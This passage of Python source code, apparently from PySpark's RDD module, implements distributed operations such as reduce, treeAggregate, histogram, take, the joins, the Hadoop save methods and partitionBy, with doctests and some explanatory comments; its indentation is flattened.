>>> result = rdd.groupBy(lambda x: x % 2).collect()
>>> sorted([(x, sorted(y)) for (x, y) in result])
[(0, [2, 8]), (1, [1, 1, 3, 5])]
"""
return self.map(lambda x: (f(x), x)).groupByKey(numPartitions)
def pipe(self, command, env={}):
"""
Return an RDD created by piping elements to a forked external process.
>>> sc.parallelize(['1', '2', '', '3']).pipe('cat').collect()
['1', '2', '', '3']
"""
def func(iterator):
pipe = Popen(
shlex.split(command), env=env, stdin=PIPE, stdout=PIPE)
def pipe_objs(out):
for obj in iterator:
out.write(str(obj).rstrip('\n') + '\n')
out.close()
Thread(target=pipe_objs, args=[pipe.stdin]).start()
return (x.rstrip('\n') for x in iter(pipe.stdout.readline, ''))
return self.mapPartitions(func)
def foreach(self, f):
"""
Applies a function to all elements of this RDD.
>>> def f(x): print x
>>> sc.parallelize([1, 2, 3, 4, 5]).foreach(f)
"""
def processPartition(iterator):
for x in iterator:
f(x)
return iter([])
self.mapPartitions(processPartition).count() # Force evaluation
def foreachPartition(self, f):
"""
Applies a function to each partition of this RDD.
>>> def f(iterator):
... for x in iterator:
... print x
>>> sc.parallelize([1, 2, 3, 4, 5]).foreachPartition(f)
"""
def func(it):
r = f(it)
try:
return iter(r)
except TypeError:
return iter([])
self.mapPartitions(func).count() # Force evaluation
def collect(self):
"""
Return a list that contains all of the elements in this RDD.
"""
with SCCallSiteSync(self.context) as css:
port = self.ctx._jvm.PythonRDD.collectAndServe(self._jrdd.rdd())
return list(_load_from_socket(port, self._jrdd_deserializer))
def reduce(self, f):
"""
Reduces the elements of this RDD using the specified commutative and
associative binary operator. Currently reduces partitions locally.
>>> from operator import add
>>> sc.parallelize([1, 2, 3, 4, 5]).reduce(add)
15
>>> sc.parallelize((2 for _ in range(10))).map(lambda x: 1).cache().reduce(add)
10
>>> sc.parallelize([]).reduce(add)
Traceback (most recent call last):
...
ValueError: Can not reduce() empty RDD
"""
def func(iterator):
iterator = iter(iterator)
try:
initial = next(iterator)
except StopIteration:
return
yield reduce(f, iterator, initial)
vals = self.mapPartitions(func).collect()
if vals:
return reduce(f, vals)
raise ValueError("Can not reduce() empty RDD")
def treeReduce(self, f, depth=2):
"""
Reduces the elements of this RDD in a multi-level tree pattern.
:param depth: suggested depth of the tree (default: 2)
>>> add = lambda x, y: x + y
>>> rdd = sc.parallelize([-5, -4, -3, -2, -1, 1, 2, 3, 4], 10)
>>> rdd.treeReduce(add)
-5
>>> rdd.treeReduce(add, 1)
-5
>>> rdd.treeReduce(add, 2)
-5
>>> rdd.treeReduce(add, 5)
-5
>>> rdd.treeReduce(add, 10)
-5
"""
if depth < 1:
raise ValueError("Depth cannot be smaller than 1 but got %d." % depth)
zeroValue = None, True # Use the second entry to indicate whether this is a dummy value.
def op(x, y):
if x[1]:
return y
elif y[1]:
return x
else:
return f(x[0], y[0]), False
reduced = self.map(lambda x: (x, False)).treeAggregate(zeroValue, op, op, depth)
if reduced[1]:
raise ValueError("Cannot reduce empty RDD.")
return reduced[0]
def fold(self, zeroValue, op):
"""
Aggregate the elements of each partition, and then the results for all
the partitions, using a given associative function and a neutral "zero
value."
The function C{op(t1, t2)} is allowed to modify C{t1} and return it
as its result value to avoid object allocation; however, it should not
modify C{t2}.
>>> from operator import add
>>> sc.parallelize([1, 2, 3, 4, 5]).fold(0, add)
15
"""
def func(iterator):
acc = zeroValue
for obj in iterator:
acc = op(obj, acc)
yield acc
vals = self.mapPartitions(func).collect()
return reduce(op, vals, zeroValue)
def aggregate(self, zeroValue, seqOp, combOp):
"""
Aggregate the elements of each partition, and then the results for all
the partitions, using a given combine functions and a neutral "zero
value."
The functions C{op(t1, t2)} is allowed to modify C{t1} and return it
as its result value to avoid object allocation; however, it should not
modify C{t2}.
The first function (seqOp) can return a different result type, U, than
the type of this RDD. Thus, we need one operation for merging a T into
a U and one operation for merging two U's.
>>> seqOp = (lambda x, y: (x[0] + y, x[1] + 1))
>>> combOp = (lambda x, y: (x[0] + y[0], x[1] + y[1]))
>>> sc.parallelize([1, 2, 3, 4]).aggregate((0, 0), seqOp, combOp)
(10, 4)
>>> sc.parallelize([]).aggregate((0, 0), seqOp, combOp)
(0, 0)
"""
def func(iterator):
acc = zeroValue
for obj in iterator:
acc = seqOp(acc, obj)
yield acc
return self.mapPartitions(func).fold(zeroValue, combOp)
def treeAggregate(self, zeroValue, seqOp, combOp, depth=2):
"""
Aggregates the elements of this RDD in a multi-level tree
pattern.
:param depth: suggested depth of the tree (default: 2)
>>> add = lambda x, y: x + y
>>> rdd = sc.parallelize([-5, -4, -3, -2, -1, 1, 2, 3, 4], 10)
>>> rdd.treeAggregate(0, add, add)
-5
>>> rdd.treeAggregate(0, add, add, 1)
-5
>>> rdd.treeAggregate(0, add, add, 2)
-5
>>> rdd.treeAggregate(0, add, add, 5)
-5
>>> rdd.treeAggregate(0, add, add, 10)
-5
"""
if depth < 1:
raise ValueError("Depth cannot be smaller than 1 but got %d." % depth)
if self.getNumPartitions() == 0:
return zeroValue
def aggregatePartition(iterator):
acc = zeroValue
for obj in iterator:
acc = seqOp(acc, obj)
yield acc
partiallyAggregated = self.mapPartitions(aggregatePartition)
numPartitions = partiallyAggregated.getNumPartitions()
scale = max(int(ceil(pow(numPartitions, 1.0 / depth))), 2)
# If creating an extra level doesn't help reduce the wall-clock time, we stop the tree
# aggregation.
while numPartitions > scale + numPartitions / scale:
numPartitions /= scale
curNumPartitions = numPartitions
def mapPartition(i, iterator):
for obj in iterator:
yield (i % curNumPartitions, obj)
partiallyAggregated = partiallyAggregated \
.mapPartitionsWithIndex(mapPartition) \
.reduceByKey(combOp, curNumPartitions) \
.values()
return partiallyAggregated.reduce(combOp)
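# Illustrative trace of the tree aggregation above (assuming 100 partitions and
# the default depth=2): scale = max(int(ceil(pow(100, 1.0 / 2))), 2) = 10, so
# the while loop runs once (100 > 10 + 100/10), shrinking 100 partitions to 10
# with a reduceByKey round; the next check (10 > 10 + 10/10) fails, and the
# final reduce(combOp) combines the 10 partial aggregates on the driver.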
def max(self, key=None):
"""
Find the maximum item in this RDD.
:param key: A function used to generate key for comparing
>>> rdd = sc.parallelize([1.0, 5.0, 43.0, 10.0])
>>> rdd.max()
43.0
>>> rdd.max(key=str)
5.0
"""
if key is None:
return self.reduce(max)
return self.reduce(lambda a, b: max(a, b, key=key))
def min(self, key=None):
"""
Find the minimum item in this RDD.
:param key: A function used to generate key for comparing
>>> rdd = sc.parallelize([2.0, 5.0, 43.0, 10.0])
>>> rdd.min()
2.0
>>> rdd.min(key=str)
10.0
"""
if key is None:
return self.reduce(min)
return self.reduce(lambda a, b: min(a, b, key=key))
def sum(self):
"""
Add up the elements in this RDD.
>>> sc.parallelize([1.0, 2.0, 3.0]).sum()
6.0
"""
return self.mapPartitions(lambda x: [sum(x)]).reduce(operator.add)
def count(self):
"""
Return the number of elements in this RDD.
>>> sc.parallelize([2, 3, 4]).count()
3
"""
return self.mapPartitions(lambda i: [sum(1 for _ in i)]).sum()
def stats(self):
"""
Return a L{StatCounter} object that captures the mean, variance
and count of the RDD's elements in one operation.
"""
def redFunc(left_counter, right_counter):
return left_counter.mergeStats(right_counter)
return self.mapPartitions(lambda i: [StatCounter(i)]).reduce(redFunc)
def histogram(self, buckets):
"""
Compute a histogram using the provided buckets. The buckets
are all open to the right except for the last which is closed.
e.g. [1,10,20,50] means the buckets are [1,10) [10,20) [20,50],
which means 1<=x<10, 10<=x<20, 20<=x<=50. And on the input of 1
and 50 we would have a histogram of 1,0,1.
If your histogram is evenly spaced (e.g. [0, 10, 20, 30]),
this can be switched from an O(log n) insertion to O(1) per
element (where n = # buckets).
Buckets must be sorted, must not contain any duplicates, and must
have at least two elements.
If `buckets` is a number, it will generate buckets which are
evenly spaced between the minimum and maximum of the RDD. For
example, if the min value is 0 and the max is 100, given buckets
as 2, the resulting buckets will be [0,50) [50,100]. buckets must
be at least 1. If the RDD contains infinity or NaN, an exception
is thrown. If the elements in the RDD do not vary (max == min),
a single bucket is always returned.
It returns a tuple of buckets and histogram.
>>> rdd = sc.parallelize(range(51))
>>> rdd.histogram(2)
([0, 25, 50], [25, 26])
>>> rdd.histogram([0, 5, 25, 50])
([0, 5, 25, 50], [5, 20, 26])
>>> rdd.histogram([0, 15, 30, 45, 60]) # evenly spaced buckets
([0, 15, 30, 45, 60], [15, 15, 15, 6])
>>> rdd = sc.parallelize(["ab", "ac", "b", "bd", "ef"])
>>> rdd.histogram(("a", "b", "c"))
(('a', 'b', 'c'), [2, 2])
"""
if isinstance(buckets, (int, long)):
if buckets < 1:
raise ValueError("number of buckets must be >= 1")
# filter out non-comparable elements
def comparable(x):
if x is None:
return False
if type(x) is float and isnan(x):
return False
return True
filtered = self.filter(comparable)
# faster than stats()
def minmax(a, b):
return min(a[0], b[0]), max(a[1], b[1])
try:
minv, maxv = filtered.map(lambda x: (x, x)).reduce(minmax)
except TypeError as e:
if " empty " in str(e):
raise ValueError("can not generate buckets from empty RDD")
raise
if minv == maxv or buckets == 1:
return [minv, maxv], [filtered.count()]
try:
inc = (maxv - minv) / buckets
except TypeError:
raise TypeError("Can not generate buckets with non-number in RDD")
if isinf(inc):
raise ValueError("Can not generate buckets with infinite value")
# keep them as integer if possible
if inc * buckets != maxv - minv:
inc = (maxv - minv) * 1.0 / buckets
buckets = [i * inc + minv for i in range(buckets)]
buckets.append(maxv) # fix accumulated error
even = True
elif isinstance(buckets, (list, tuple)):
if len(buckets) < 2:
raise ValueError("buckets should have more than one value")
if any(i is None or isinstance(i, float) and isnan(i) for i in buckets):
raise ValueError("can not have None or NaN in buckets")
if sorted(buckets) != list(buckets):
raise ValueError("buckets should be sorted")
if len(set(buckets)) != len(buckets):
raise ValueError("buckets should not contain duplicated values")
minv = buckets[0]
maxv = buckets[-1]
even = False
inc = None
try:
steps = [buckets[i + 1] - buckets[i] for i in range(len(buckets) - 1)]
except TypeError:
pass # objects in buckets do not support '-'
else:
if max(steps) - min(steps) < 1e-10: # handle precision errors
even = True
inc = (maxv - minv) / (len(buckets) - 1)
else:
raise TypeError("buckets should be a list or tuple or number(int or long)")
def histogram(iterator):
counters = [0] * len(buckets)
for i in iterator:
if i is None or (type(i) is float and isnan(i)) or i > maxv or i < minv:
continue
t = (int((i - minv) / inc) if even
else bisect.bisect_right(buckets, i) - 1)
counters[t] += 1
# add last two together
last = counters.pop()
counters[-1] += last
return [counters]
def mergeCounters(a, b):
return [i + j for i, j in zip(a, b)]
return buckets, self.mapPartitions(histogram).reduce(mergeCounters)
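# Hedged example of the even-bucket index computation inside histogram(): with
# buckets [0, 25, 50] we have inc = 25, so a value v is counted at index
# int((v - minv) / inc); v = 49 -> 1 and v = 50 -> 2, and merging the last two
# counters is what makes the final bucket closed on the right.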
def mean(self):
"""
Compute the mean of this RDD's elements.
>>> sc.parallelize([1, 2, 3]).mean()
2.0
"""
return self.stats().mean()
def variance(self):
"""
Compute the variance of this RDD's elements.
>>> sc.parallelize([1, 2, 3]).variance()
0.666...
"""
return self.stats().variance()
def stdev(self):
"""
Compute the standard deviation of this RDD's elements.
>>> sc.parallelize([1, 2, 3]).stdev()
0.816...
"""
return self.stats().stdev()
def sampleStdev(self):
"""
Compute the sample standard deviation of this RDD's elements (which
corrects for bias in estimating the standard deviation by dividing by
N-1 instead of N).
>>> sc.parallelize([1, 2, 3]).sampleStdev()
1.0
"""
return self.stats().sampleStdev()
def sampleVariance(self):
"""
Compute the sample variance of this RDD's elements (which corrects
for bias in estimating the variance by dividing by N-1 instead of N).
>>> sc.parallelize([1, 2, 3]).sampleVariance()
1.0
"""
return self.stats().sampleVariance()
def countByValue(self):
"""
Return the count of each unique value in this RDD as a dictionary of
(value, count) pairs.
>>> sorted(sc.parallelize([1, 2, 1, 2, 2], 2).countByValue().items())
[(1, 2), (2, 3)]
"""
def countPartition(iterator):
counts = defaultdict(int)
for obj in iterator:
counts[obj] += 1
yield counts
def mergeMaps(m1, m2):
for k, v in m2.iteritems():
m1[k] += v
return m1
return self.mapPartitions(countPartition).reduce(mergeMaps)
def top(self, num, key=None):
"""
Get the top N elements from a RDD.
Note: It returns the list sorted in descending order.
>>> sc.parallelize([10, 4, 2, 12, 3]).top(1)
[12]
>>> sc.parallelize([2, 3, 4, 5, 6], 2).top(2)
[6, 5]
>>> sc.parallelize([10, 4, 2, 12, 3]).top(3, key=str)
[4, 3, 2]
"""
def topIterator(iterator):
yield heapq.nlargest(num, iterator, key=key)
def merge(a, b):
return heapq.nlargest(num, a + b, key=key)
return self.mapPartitions(topIterator).reduce(merge)
def takeOrdered(self, num, key=None):
"""
Get the N elements from a RDD ordered in ascending order or as
specified by the optional key function.
>>> sc.parallelize([10, 1, 2, 9, 3, 4, 5, 6, 7]).takeOrdered(6)
[1, 2, 3, 4, 5, 6]
>>> sc.parallelize([10, 1, 2, 9, 3, 4, 5, 6, 7], 2).takeOrdered(6, key=lambda x: -x)
[10, 9, 7, 6, 5, 4]
"""
def merge(a, b):
return heapq.nsmallest(num, a + b, key)
return self.mapPartitions(lambda it: [heapq.nsmallest(num, it, key)]).reduce(merge)
def take(self, num):
"""
Take the first num elements of the RDD.
It works by first scanning one partition, and use the results from
that partition to estimate the number of additional partitions needed
to satisfy the limit.
Translated from the Scala implementation in RDD#take().
>>> sc.parallelize([2, 3, 4, 5, 6]).cache().take(2)
[2, 3]
>>> sc.parallelize([2, 3, 4, 5, 6]).take(10)
[2, 3, 4, 5, 6]
>>> sc.parallelize(range(100), 100).filter(lambda x: x > 90).take(3)
[91, 92, 93]
"""
items = []
totalParts = self._jrdd.partitions().size()
partsScanned = 0
while len(items) < num and partsScanned < totalParts:
# The number of partitions to try in this iteration.
# It is ok for this number to be greater than totalParts because
# we actually cap it at totalParts in runJob.
numPartsToTry = 1
if partsScanned > 0:
# If we didn't find any rows after the previous iteration,
# quadruple and retry. Otherwise, interpolate the number of
# partitions we need to try, but overestimate it by 50%.
# We also cap the estimation in the end.
if len(items) == 0:
numPartsToTry = partsScanned * 4
else:
# the first parameter of max is >=1 whenever partsScanned >= 2
numPartsToTry = int(1.5 * num * partsScanned / len(items)) - partsScanned
numPartsToTry = min(max(numPartsToTry, 1), partsScanned * 4)
left = num - len(items)
def takeUpToNumLeft(iterator):
iterator = iter(iterator)
taken = 0
while taken < left:
yield next(iterator)
taken += 1
p = range(partsScanned, min(partsScanned + numPartsToTry, totalParts))
res = self.context.runJob(self, takeUpToNumLeft, p, True)
items += res
partsScanned += numPartsToTry
return items[:num]
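# Sketch of the partition-scan growth above (read off this loop only): asking
# for num rows scans 1 partition first; if nothing is found, the next pass
# tries 4 * partsScanned partitions (so the cumulative scan grows 1, 5, 25, ...),
# and if some rows were found the next batch is interpolated as
# int(1.5 * num * partsScanned / len(items)) - partsScanned, capped at
# 4 * partsScanned, so sparse RDDs are covered in a logarithmic number of passes.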
def first(self):
"""
Return the first element in this RDD.
>>> sc.parallelize([2, 3, 4]).first()
2
>>> sc.parallelize([]).first()
Traceback (most recent call last):
...
ValueError: RDD is empty
"""
rs = self.take(1)
if rs:
return rs[0]
raise ValueError("RDD is empty")
def isEmpty(self):
"""
Returns true if and only if the RDD contains no elements at all. Note that an RDD
may be empty even when it has at least 1 partition.
>>> sc.parallelize([]).isEmpty()
True
>>> sc.parallelize([1]).isEmpty()
False
"""
return self._jrdd.partitions().size() == 0 or len(self.take(1)) == 0
def saveAsNewAPIHadoopDataset(self, conf, keyConverter=None, valueConverter=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the new Hadoop OutputFormat API (mapreduce package). Keys/values are
converted for output using either user specified converters or, by default,
L{org.apache.spark.api.python.JavaToWritableConverter}.
:param conf: Hadoop job configuration, passed in as a dict
:param keyConverter: (None by default)
:param valueConverter: (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsHadoopDataset(pickledRDD._jrdd, True, jconf,
keyConverter, valueConverter, True)
def saveAsNewAPIHadoopFile(self, path, outputFormatClass, keyClass=None, valueClass=None,
keyConverter=None, valueConverter=None, conf=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the new Hadoop OutputFormat API (mapreduce package). Key and value types
will be inferred if not specified. Keys and values are converted for output using either
user specified converters or L{org.apache.spark.api.python.JavaToWritableConverter}. The
C{conf} is applied on top of the base Hadoop conf associated with the SparkContext
of this RDD to create a merged Hadoop MapReduce job configuration for saving the data.
:param path: path to Hadoop file
:param outputFormatClass: fully qualified classname of Hadoop OutputFormat
(e.g. "org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat")
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.IntWritable", None by default)
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.Text", None by default)
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param conf: Hadoop job configuration, passed in as a dict (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsNewAPIHadoopFile(pickledRDD._jrdd, True, path,
outputFormatClass,
keyClass, valueClass,
keyConverter, valueConverter, jconf)
def saveAsHadoopDataset(self, conf, keyConverter=None, valueConverter=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the old Hadoop OutputFormat API (mapred package). Keys/values are
converted for output using either user specified converters or, by default,
L{org.apache.spark.api.python.JavaToWritableConverter}.
:param conf: Hadoop job configuration, passed in as a dict
:param keyConverter: (None by default)
:param valueConverter: (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsHadoopDataset(pickledRDD._jrdd, True, jconf,
keyConverter, valueConverter, False)
def saveAsHadoopFile(self, path, outputFormatClass, keyClass=None, valueClass=None,
keyConverter=None, valueConverter=None, conf=None,
compressionCodecClass=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the old Hadoop OutputFormat API (mapred package). Key and value types
will be inferred if not specified. Keys and values are converted for output using either
user specified converters or L{org.apache.spark.api.python.JavaToWritableConverter}. The
C{conf} is applied on top of the base Hadoop conf associated with the SparkContext
of this RDD to create a merged Hadoop MapReduce job configuration for saving the data.
:param path: path to Hadoop file
:param outputFormatClass: fully qualified classname of Hadoop OutputFormat
(e.g. "org.apache.hadoop.mapred.SequenceFileOutputFormat")
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.IntWritable", None by default)
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.Text", None by default)
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param conf: (None by default)
:param compressionCodecClass: (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsHadoopFile(pickledRDD._jrdd, True, path,
outputFormatClass,
keyClass, valueClass,
keyConverter, valueConverter,
jconf, compressionCodecClass)
def saveAsSequenceFile(self, path, compressionCodecClass=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the L{org.apache.hadoop.io.Writable} types that we convert from the
RDD's key and value types. The mechanism is as follows:
1. Pyrolite is used to convert pickled Python RDD into RDD of Java objects.
2. Keys and values of this Java RDD are converted to Writables and written out.
:param path: path to sequence file
:param compressionCodecClass: (None by default)
"""
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsSequenceFile(pickledRDD._jrdd, True,
path, compressionCodecClass)
def saveAsPickleFile(self, path, batchSize=10):
"""
Save this RDD as a SequenceFile of serialized objects. The serializer
used is L{pyspark.serializers.PickleSerializer}, default batch size
is 10.
>>> tmpFile = NamedTemporaryFile(delete=True)
>>> tmpFile.close()
>>> sc.parallelize([1, 2, 'spark', 'rdd']).saveAsPickleFile(tmpFile.name, 3)
>>> sorted(sc.pickleFile(tmpFile.name, 5).collect())
[1, 2, 'rdd', 'spark']
"""
if batchSize == 0:
ser = AutoBatchedSerializer(PickleSerializer())
else:
ser = BatchedSerializer(PickleSerializer(), batchSize)
self._reserialize(ser)._jrdd.saveAsObjectFile(path)
def saveAsTextFile(self, path, compressionCodecClass=None):
"""
Save this RDD as a text file, using string representations of elements.
@param path: path to text file
@param compressionCodecClass: (None by default) string i.e.
"org.apache.hadoop.io.compress.GzipCodec"
>>> tempFile = NamedTemporaryFile(delete=True)
>>> tempFile.close()
>>> sc.parallelize(range(10)).saveAsTextFile(tempFile.name)
>>> from fileinput import input
>>> from glob import glob
>>> ''.join(sorted(input(glob(tempFile.name + "/part-0000*"))))
'0\\n1\\n2\\n3\\n4\\n5\\n6\\n7\\n8\\n9\\n'
Empty lines are tolerated when saving to text files.
>>> tempFile2 = NamedTemporaryFile(delete=True)
>>> tempFile2.close()
>>> sc.parallelize(['', 'foo', '', 'bar', '']).saveAsTextFile(tempFile2.name)
>>> ''.join(sorted(input(glob(tempFile2.name + "/part-0000*"))))
'\\n\\n\\nbar\\nfoo\\n'
Using compressionCodecClass
>>> tempFile3 = NamedTemporaryFile(delete=True)
>>> tempFile3.close()
>>> codec = "org.apache.hadoop.io.compress.GzipCodec"
>>> sc.parallelize(['foo', 'bar']).saveAsTextFile(tempFile3.name, codec)
>>> from fileinput import input, hook_compressed
>>> ''.join(sorted(input(glob(tempFile3.name + "/part*.gz"), openhook=hook_compressed)))
'bar\\nfoo\\n'
"""
def func(split, iterator):
for x in iterator:
if not isinstance(x, basestring):
x = unicode(x)
if isinstance(x, unicode):
x = x.encode("utf-8")
yield x
keyed = self.mapPartitionsWithIndex(func)
keyed._bypass_serializer = True
if compressionCodecClass:
compressionCodec = self.ctx._jvm.java.lang.Class.forName(compressionCodecClass)
keyed._jrdd.map(self.ctx._jvm.BytesToString()).saveAsTextFile(path, compressionCodec)
else:
keyed._jrdd.map(self.ctx._jvm.BytesToString()).saveAsTextFile(path)
# Pair functions
def collectAsMap(self):
"""
Return the key-value pairs in this RDD to the master as a dictionary.
>>> m = sc.parallelize([(1, 2), (3, 4)]).collectAsMap()
>>> m[1]
2
>>> m[3]
4
"""
return dict(self.collect())
def keys(self):
"""
Return an RDD with the keys of each tuple.
>>> m = sc.parallelize([(1, 2), (3, 4)]).keys()
>>> m.collect()
[1, 3]
"""
return self.map(lambda (k, v): k)
def values(self):
"""
Return an RDD with the values of each tuple.
>>> m = sc.parallelize([(1, 2), (3, 4)]).values()
>>> m.collect()
[2, 4]
"""
return self.map(lambda (k, v): v)
def reduceByKey(self, func, numPartitions=None):
"""
Merge the values for each key using an associative reduce function.
This will also perform the merging locally on each mapper before
sending results to a reducer, similarly to a "combiner" in MapReduce.
Output will be hash-partitioned with C{numPartitions} partitions, or
the default parallelism level if C{numPartitions} is not specified.
>>> from operator import add
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.reduceByKey(add).collect())
[('a', 2), ('b', 1)]
"""
return self.combineByKey(lambda x: x, func, func, numPartitions)
def reduceByKeyLocally(self, func):
"""
Merge the values for each key using an associative reduce function, but
return the results immediately to the master as a dictionary.
This will also perform the merging locally on each mapper before
sending results to a reducer, similarly to a "combiner" in MapReduce.
>>> from operator import add
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.reduceByKeyLocally(add).items())
[('a', 2), ('b', 1)]
"""
def reducePartition(iterator):
m = {}
for k, v in iterator:
m[k] = func(m[k], v) if k in m else v
yield m
def mergeMaps(m1, m2):
for k, v in m2.iteritems():
m1[k] = func(m1[k], v) if k in m1 else v
return m1
return self.mapPartitions(reducePartition).reduce(mergeMaps)
def countByKey(self):
"""
Count the number of elements for each key, and return the result to the
master as a dictionary.
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.countByKey().items())
[('a', 2), ('b', 1)]
"""
return self.map(lambda x: x[0]).countByValue()
def join(self, other, numPartitions=None):
"""
Return an RDD containing all pairs of elements with matching keys in
C{self} and C{other}.
Each pair of elements will be returned as a (k, (v1, v2)) tuple, where
(k, v1) is in C{self} and (k, v2) is in C{other}.
Performs a hash join across the cluster.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2), ("a", 3)])
>>> sorted(x.join(y).collect())
[('a', (1, 2)), ('a', (1, 3))]
"""
return python_join(self, other, numPartitions)
def leftOuterJoin(self, other, numPartitions=None):
"""
Perform a left outer join of C{self} and C{other}.
For each element (k, v) in C{self}, the resulting RDD will either
contain all pairs (k, (v, w)) for w in C{other}, or the pair
(k, (v, None)) if no elements in C{other} have key k.
Hash-partitions the resulting RDD into the given number of partitions.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> sorted(x.leftOuterJoin(y).collect())
[('a', (1, 2)), ('b', (4, None))]
"""
return python_left_outer_join(self, other, numPartitions)
def rightOuterJoin(self, other, numPartitions=None):
"""
Perform a right outer join of C{self} and C{other}.
For each element (k, w) in C{other}, the resulting RDD will either
contain all pairs (k, (v, w)) for v in this, or the pair (k, (None, w))
if no elements in C{self} have key k.
Hash-partitions the resulting RDD into the given number of partitions.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> sorted(y.rightOuterJoin(x).collect())
[('a', (2, 1)), ('b', (None, 4))]
"""
return python_right_outer_join(self, other, numPartitions)
def fullOuterJoin(self, other, numPartitions=None):
"""
Perform a full outer join of C{self} and C{other}.
For each element (k, v) in C{self}, the resulting RDD will either
contain all pairs (k, (v, w)) for w in C{other}, or the pair
(k, (v, None)) if no elements in C{other} have key k.
Similarly, for each element (k, w) in C{other}, the resulting RDD will
either contain all pairs (k, (v, w)) for v in C{self}, or the pair
(k, (None, w)) if no elements in C{self} have key k.
Hash-partitions the resulting RDD into the given number of partitions.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2), ("c", 8)])
>>> sorted(x.fullOuterJoin(y).collect())
[('a', (1, 2)), ('b', (4, None)), ('c', (None, 8))]
"""
return python_full_outer_join(self, other, numPartitions)
# TODO: add option to control map-side combining
# portable_hash is used as default, because builtin hash of None is different
# cross machines.
def partitionBy(self, numPartitions, partitionFunc=portable_hash):
"""
Return a copy of the RDD partitioned using the specified partitioner.
>>> pairs = sc.parallelize([1, 2, 3, 4, 2, 4, 1]).map(lambda x: (x, x))
>>> sets = pairs.partitionBy(2).glom().collect()
>>> set(sets[0]).intersection(set(sets[1]))
set([])
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
partitioner = Partitioner(numPartitions, partitionFunc)
if self.partitioner == partitioner:
return self
# Transferring O(n) objects to Java is too expensive.
# Instead, we'll form the hash buckets in Python,
# transferring O(numPartitions) objects to Java.
# Each object is a (splitNumber, [objects]) pair.
# To avoid overly large objects, the objects are
# grouped into chunks.
outputSerializer = self.ctx._unbatched_serializer
limit = (_parse_memory(self.ctx._conf.get(
"spark.python.worker.memory", "512m")) / 2)
def add_shuffle_key(split, iterator):
buckets = defaultdict(list)
c, batch = 0, min(10 * numPartitions, 1000)
for k, v in iterator:
buckets[partitionFunc(k) % numPartitions].append((k, v))
c += 1
# check used memory and avg size of chunk of objects
if (c % 1000 == 0 and get_used_memory() > limit
or c > batch):
n, size = len(buckets), 0
for split in buckets.keys():
yield pack_long(split)
d = outputSerializer.dumps(buckets[split])
del buckets[split]
yield d
size += len(d)
avg = (size / n) >> 20
# let 1M < avg < 10M
if avg < 1:
batch *= 1.5
elif avg > 10:
batch = max(batch / 1.5, 1)
c = 0
for split, items in buckets.iteritems():
yield pack_long(split)
yield outputSerializer.dumps(items)
keyed = self.mapPartitionsWithIndex(add_shuffle_key, preservesPartitioning=True)
keyed._bypass_serializer = True
with SCCallSiteSync(self.context) as css:
pairRDD = self.ctx._jvm.PairwiseRDD(
keyed._jrdd.rdd()).asJavaPairRDD()
jpartitioner = self.ctx._jvm.PythonPartitioner(numPartitions,
id(partitionFunc))
jrdd = self.ctx._jvm.PythonRDD.valueOfPair(pairRDD.partitionBy(jpartitioner))
rdd = RDD(jrdd, self.ctx, BatchedSerializer(outputSerializer))
rdd.partitioner = partitioner
return rdd
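# Illustrative note on the adaptive batching in add_shuffle_key above: buckets
# are flushed when c exceeds batch, or (checked every 1000 records) when used
# memory passes half of spark.python.worker.memory; batch is then retuned so
# the average serialized chunk stays between 1 MB and 10 MB:
#   avg = (size / n) >> 20                      # MB per flushed bucket
#   avg < 1  -> batch *= 1.5                    # chunks too small, batch more
#   avg > 10 -> batch = max(batch / 1.5, 1)     # chunks too big, batch less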
# TODO: add control over map-side aggregation
def combineByKey(self, createCombiner, mergeValue, mergeCombiners,
numPartitions=None):
"""
Generic function to combine the elements for each key using a custom
set of aggregation functions.
Turns an RDD[(K, V)] into a result of type RDD[(K, C)], for a "combined
type" C. Note that V and C can be different -- for example, one might
group an RDD of type (Int, Int) into an RDD of type (Int, List[Int]).
Users provide three functions:
- C{createCombiner}, which turns a V into a C (e.g., creates
a one-element list)
- C{mergeValue}, to merge a V into a C (e.g., adds it to the end of
a list)
- C{mergeCombiners}, to combine two C's into a single one.
In addition, users can control the partitioning of the output RDD.
>>> x = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> def f(x): return x
>>> def add(a, b): return a + str(b)
>>> sorted(x.combineByKey(str, add, add).collect())
[('a', '11'), ('b', '1')]
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
serializer = self.ctx.serializer
spill = (self.ctx._conf.get("spark.shuffle.spill", 'True').lower()
== 'true')
memory = _parse_memory(self.ctx._conf.get(
